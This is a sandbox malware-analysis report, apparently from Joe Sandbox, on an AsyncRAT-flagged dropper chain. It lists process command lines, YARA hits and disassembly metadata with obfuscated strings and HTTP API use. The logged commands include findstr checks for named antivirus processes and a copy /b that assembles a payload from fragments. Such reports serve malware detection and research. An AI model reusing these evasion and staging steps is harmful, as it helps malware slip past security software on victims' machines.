Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000026.00000000.2086470642.0000000000DF2000.00000002.00000001.01000000.00000019.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe, Author: ditekSHen
Antivirus matches:	Detection: 79%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	18:31:25
Start date:	26/08/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xec0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	18:31:25
Start date:	26/08/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa.exe opssvc.exe"
Imagebase:	0xb10000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	18:31:27
Start date:	26/08/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xec0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	18:31:27
Start date:	26/08/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
Imagebase:	0xb10000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	18:31:28
Start date:	26/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 40365
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	18:31:28
Start date:	26/08/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "HopeBuildersGeniusIslam" Sonic
Imagebase:	0xb10000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	18:31:28
Start date:	26/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Mr + ..\Minister + ..\Template + ..\Dietary + ..\Speak + ..\Mobile + ..\Zinc + ..\Continue s
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 04BD06A0 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1300635028.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bd0000_PQ2AUndsdb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23e35a5317ef1719d1fda8d380402ee39b0ee8289b07893d70f993eb1702e7e
Instruction ID: da770485641275f18ac250fb30313bdcb822df202f0cf8591db4b61b49f26da7
Opcode Fuzzy Hash: a23e35a5317ef1719d1fda8d380402ee39b0ee8289b07893d70f993eb1702e7e
Instruction Fuzzy Hash: 702160EB28C1207DB142A5823F589F66B6EE5C3734B3184F7F506D9502F2C91E9E6532

Function 04BD06C8 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1300635028.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bd0000_PQ2AUndsdb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf1b8d580c22499b4c4033aab4e8c5c0ee19dca8872fc144ba600c6972c4fd64
Instruction ID: 45b777cfe127a1a76e9143f2dc1d22cdacd8a08eafe357e67d94f721e60b680e
Opcode Fuzzy Hash: cf1b8d580c22499b4c4033aab4e8c5c0ee19dca8872fc144ba600c6972c4fd64
Instruction Fuzzy Hash: A7210BEB28C1647DB14295822F54EFBAB6EE5C2734731C4B7F806D5402F2D94E8E6532

Function 04BD06CF Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1300635028.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bd0000_PQ2AUndsdb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5030c0cf648c08640848e19625e0dfb6aa9b510b0309d7dd9252f6d4b6bf2ba
Instruction ID: 82065f4f894fe1bcd9ab0c2eb4733ce82bf1621f4a33d5a07a8728d381b826ca
Opcode Fuzzy Hash: f5030c0cf648c08640848e19625e0dfb6aa9b510b0309d7dd9252f6d4b6bf2ba
Instruction Fuzzy Hash: 03210EEB28D1647DB14295822F58EFAAB6EE4C3730731C4B7F906D5402F2D90E9E6532

Function 04BD0712 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1300635028.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bd0000_PQ2AUndsdb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 667a4531b9a042e76e6bb45ee470bda2639fa522d871356c45d7efc61b0ac6d6
Instruction ID: a330d8a0dd57f62c281829979b03f6eedbbfca51d56219d8836a5149c2d92316
Opcode Fuzzy Hash: 667a4531b9a042e76e6bb45ee470bda2639fa522d871356c45d7efc61b0ac6d6
Instruction Fuzzy Hash: D101C0EB28C1247DB24296822B54AFABB7EE5C2730730C8B7F502D5402F2D90E9D2572

Function 04BD0739 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1300635028.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bd0000_PQ2AUndsdb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01bf6ec8e1031dd5c566d9fc4bc987dbd92ae07a8d5376d53ac390bc3fd444ce
Instruction ID: 81ca0ac0543bd4a919959ff7090065fba7e0c3961af4b2d145798ac9563807fd
Opcode Fuzzy Hash: 01bf6ec8e1031dd5c566d9fc4bc987dbd92ae07a8d5376d53ac390bc3fd444ce
Instruction Fuzzy Hash: E9014CEB28C1547DB24295822F54AF7AB6EE6C2B30730C8B7F502D6442F2D90E8D6532

Function 04BD077B Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1300635028.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bd0000_PQ2AUndsdb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0df9906201f6aac61d082e62beeab3e974ab8d45262dfcb834f3ec084f34e1df
Instruction ID: 388df696ee1182e83add9cbdb61a19d3840388260195d26d71a45bc0bd8b5765
Opcode Fuzzy Hash: 0df9906201f6aac61d082e62beeab3e974ab8d45262dfcb834f3ec084f34e1df
Instruction Fuzzy Hash: 1EF02DA714C200AEE201D69527599F5777DF9C3734734C4EBF043CA012F29A4A1E9532

Function 04BD07C7 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1300635028.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bd0000_PQ2AUndsdb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 841a2710d88ab4756fc9ffd84abe5715c69e4bf4bd462dbf71f042d11918faaf
Instruction ID: c0c4e86f14fc58f1549cd7ceab63d3482378d6d11c995065c0b9cf8bc46a8d48
Opcode Fuzzy Hash: 841a2710d88ab4756fc9ffd84abe5715c69e4bf4bd462dbf71f042d11918faaf
Instruction Fuzzy Hash: 68D0A7A314C000ADA240A9D53B18AF637AED5D5B3037188D3F181C2402F61A404DD531

Analysis Process: axplong.exePID: 7944, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	13.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.2%
Total number of Nodes:	1392
Total number of Limit Nodes:	55

Executed Functions

Function 005CBD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00618D70,00000000,00000000,00000000,00000000), ref: 005CBDED
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 005CBE11
HttpOpenRequestA.WININET(?,00000000), ref: 005CBE5B
HttpSendRequestA.WININET(?,00000000), ref: 005CBF1A
InternetReadFile.WININET(?,?,000003FF,?), ref: 005CBFCD
InternetCloseHandle.WININET(?), ref: 005CC0A7
InternetCloseHandle.WININET(?), ref: 005CC0AF
InternetCloseHandle.WININET(?), ref: 005CC0B7

Strings

8KG0fCKZFzY=, xrefs: 005CC385
8KG0fymoFx==, xrefs: 005CC2EB, 005CC543
d4b, xrefs: 005CE2FF
RHYTYv==, xrefs: 005CBE33
RpKt, xrefs: 005CD516
invalid stoi argument, xrefs: 005CE404
stoi argument out of range, xrefs: 005CE3FA

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4b$invalid stoi argument$stoi argument out of range
API String ID: 688256393-178154197
Opcode ID: 89883ecc1793cec03ed5c5616471aebbc758c1c27958711f013112248199cb14
Instruction ID: 842cb3b6c05aa0e4425dd31e4851116a818c675e9bb3807b161ba80085f10c60
Opcode Fuzzy Hash: 89883ecc1793cec03ed5c5616471aebbc758c1c27958711f013112248199cb14
Instruction Fuzzy Hash: 1EB1B1B16101189FEB24CF68CC89BAEBF69FF85304F5041ADE50997282D7719AC4CFA5

Function 005CE440 Relevance: 14.6, Strings: 11, Instructions: 878
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

WWp=, xrefs: 005D04DA
WGt=, xrefs: 005CF62D, 005CF90A
#, xrefs: 005D0534
MT==, xrefs: 005CE4A5
GqKudSO2, xrefs: 005CE47F
UD==, xrefs: 005CEA1F, 005CEC66
fed3aa, xrefs: 005CFA9E
d4b, xrefs: 005CF6D5
MJB+, xrefs: 005CE734
246122658369, xrefs: 005CF647, 005CF924, 005D04F7
111, xrefs: 005CF6B0

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$d4b$fed3aa
API String ID: 0-2249317206
Opcode ID: 665e2f5342581d62371b43b4e04815285f30cc699242fa8fe22889cb73dfde84
Instruction ID: 09669d9ab38c85d04787544ffee7254e150da23e1ceabd924c0028dd817838fd
Opcode Fuzzy Hash: 665e2f5342581d62371b43b4e04815285f30cc699242fa8fe22889cb73dfde84
Instruction Fuzzy Hash: 4672F470900289DFEF14EFA8C94ABDD7FB6BB45304F50419AE805673C2D7759A88CB92

Function 005C65B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 005C6650

Strings

RBPleCSm, xrefs: 005C666C
IVKsgL==, xrefs: 005C67A1
GVQsgL==, xrefs: 005C66F8

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: GVQsgL==$IVKsgL==$RBPleCSm
API String ID: 1484870144-3856690409
Opcode ID: fafa83c22b51ee061ad3c185dd34be6bd64fdcb4657ed8640270e6a551470302
Instruction ID: ecdef5cb57c18d26f9b5f230b661f89fa3acbd1c038926481465a3d4c30de79d
Opcode Fuzzy Hash: fafa83c22b51ee061ad3c185dd34be6bd64fdcb4657ed8640270e6a551470302
Instruction Fuzzy Hash: E49184B19001199FDB28DB68CC89BDDBB79FB49304F4045EDE50997282DA359BC4CFA4

Function 005DD312 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 005C247E

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 7aa33e6ef17734005e56e765439133012d40b55eee1f0c1ffd9e2faa62b92df3
Instruction ID: f824dab7a28a74010656f6b1b5311fcf58a59507972a21c97de747da3b0a4034
Opcode Fuzzy Hash: 7aa33e6ef17734005e56e765439133012d40b55eee1f0c1ffd9e2faa62b92df3
Instruction Fuzzy Hash: 6951BCB1900A069FDB35CF59D8857AABBF6FB48310F24862BD405EB754D3349941CFA1

Function 005D46C0 Relevance: 37.0, APIs: 1, Strings: 22, Instructions: 2484COMMON

Download Yara Rule

Strings

8ZF6, xrefs: 005D5502
aZT6, xrefs: 005D53CC
mP=, xrefs: 005D6383, 005D6652
Fz==, xrefs: 005D4D2D
6F9fr==, xrefs: 005D4712
WJP6, xrefs: 005D53A3
9526, xrefs: 005D531D
fed3aa, xrefs: 005D5489
MJB+, xrefs: 005D4776, 005D47ED, 005D4A95, 005D4B0C
KFT0PL==, xrefs: 005D54B9
Vp 6, xrefs: 005D5447
MJF+, xrefs: 005D47BD, 005D48EC, 005D4ADC, 005D4C0B
V0x6, xrefs: 005D541E
aqB6, xrefs: 005D54DB
JB6, xrefs: 005D53F5
V0N6, xrefs: 005D537A
96B6, xrefs: 005D5470
9KN6, xrefs: 005D5351
246122658369, xrefs: 005D4F4D, 005D4F8F, 005D4F99, 005D54F4
5F6, xrefs: 005D5497
stoi argument out of range, xrefs: 005D4EAC
-b, xrefs: 005D4F3A

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequest
String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-b
API String ID: 3545240790-3750592384
Opcode ID: 28576258ac23a969f14fe06f48fb15e272475697ce4f64fa575adfb0e4a7dbe7
Instruction ID: cdcad65da3d1359af813e7411aa3c15f02f5fdec87b6d2ab22baad6a196774c4
Opcode Fuzzy Hash: 28576258ac23a969f14fe06f48fb15e272475697ce4f64fa575adfb0e4a7dbe7
Instruction Fuzzy Hash: F6232470A001589BEB29DB2CCD8979DBF76AB85304F5481DAE049A73C2EB359F84CF51

Function 005D2E20 Relevance: 36.3, APIs: 5, Strings: 15, Instructions: 1325COMMON

Download Yara Rule

APIs

Part of subcall function 005D7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 005D795C
Part of subcall function 005D7870: __Cnd_destroy_in_situ.LIBCPMT ref: 005D7968
Part of subcall function 005D7870: __Mtx_destroy_in_situ.LIBCPMT ref: 005D7971

std::_Xinvalid_argument.LIBCPMT ref: 005D425F

Strings

8KG0fCKZFzY=, xrefs: 005D2F64
", xrefs: 005D3E99
WGt=, xrefs: 005D27D1, 005D33BA
Fz==, xrefs: 005D369E
5120, xrefs: 005D3ABF, 005D3BAA
W07l, xrefs: 005D3AEE
HBhr, xrefs: 005D378F
WWp=, xrefs: 005D2A93, 005D3359
WJms, xrefs: 005D3BD9
8KG0fymoFx==, xrefs: 005D2EC7, 005D3136
V5Qk, xrefs: 005D3DC0
246122658369, xrefs: 005D1EA5, 005D27EE, 005D2A43, 005D2AB0, 005D2E88, 005D3373, 005D33D4
WWt=, xrefs: 005D1E88, 005D2A26, 005D2E6E
invalid stoi argument, xrefs: 005D2DE9, 005D2DF8, 005D2E20, 005D425A
stoi argument out of range, xrefs: 005D2E02, 005D4269

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: "$246122658369$5120$8KG0fCKZFzY=$8KG0fymoFx==$Fz==$HBhr$V5Qk$W07l$WGt=$WJms$WWp=$WWt=$invalid stoi argument$stoi argument out of range
API String ID: 4234742559-2030321068
Opcode ID: c63a4eeaa321da1bb493d91ffaad8bd6d888dd8186bb9ce5d9c46ff19409f2a6
Instruction ID: 3b17a90fa37d8e54a1dea5c41723bc0f0f6927b39d7f6d852cd5567829d64c07
Opcode Fuzzy Hash: c63a4eeaa321da1bb493d91ffaad8bd6d888dd8186bb9ce5d9c46ff19409f2a6
Instruction Fuzzy Hash: F8B2F371A002499BDF28EF6CCC4A79DBF76BF85304F50419BE405A7382D7759A84CBA2

Function 005C5DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 005C600A
00000419, xrefs: 005C5FA8
00000422, xrefs: 005C5FD9
0000043f, xrefs: 005C603B
Keyboard Layout\Preload, xrefs: 005C5F64

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2506797224.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.0000000000891000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2507204359.00000000008D3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2514795761.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517495918.0000000000A71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2517815879.0000000000A73000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5c0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 890b28fcc62d79f0b914f48211440b272928d440df6b1e72b9fd41e53de1bfb3
Instruction ID: ea1017afff7c63fd35a72002112e83f8a68fc627df65ec2c5d8d56a67611da18
Opcode Fuzzy Hash: 890b28fcc62d79f0b914f48211440b272928d440df6b1e72b9fd41e53de1bfb3
Instruction Fuzzy Hash: 12E16D71900219AFEB24DBA4CC89BDEBB79FB44304F5042DAE509A7292D774ABC4CF51

Function 005C7D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 005C7EA3

Strings

JmpxQb==, xrefs: 005C81B2
JmpxRL==, xrefs: 005C8062
JmpyPb==, xrefs: 005C810A

Memory Dump Source

Source File: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000011.00000002.2505022114.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000011.00000002.2505348134.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
